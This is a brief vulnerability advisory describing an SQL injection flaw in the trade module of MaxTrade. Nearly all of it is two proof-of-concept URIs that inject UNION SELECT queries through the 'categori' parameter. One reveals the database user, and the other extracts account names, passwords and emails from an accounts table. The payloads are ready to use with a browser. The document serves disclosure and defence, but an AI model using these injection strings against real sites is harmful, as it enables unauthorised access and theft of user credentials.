|
MaxTrade Trade Module SQL Injection Vulnerability
Attackers can use a browser to exploit this issue. The following proof-of-concept URIs are available: http://www.example.com//modules.php?module=trade&function=pocategorisell&cat=0&stranica=menu&categori=-1+union+select+current_user,2/* http://www.example.com//modules.php?module=trade&function=pocategorisell&cat=0&stranica=menu&categori=-1+union+select+concat_ws(0x3a3a,name,password,email),2+from+accounts/* |
|
|
Privacy Statement |
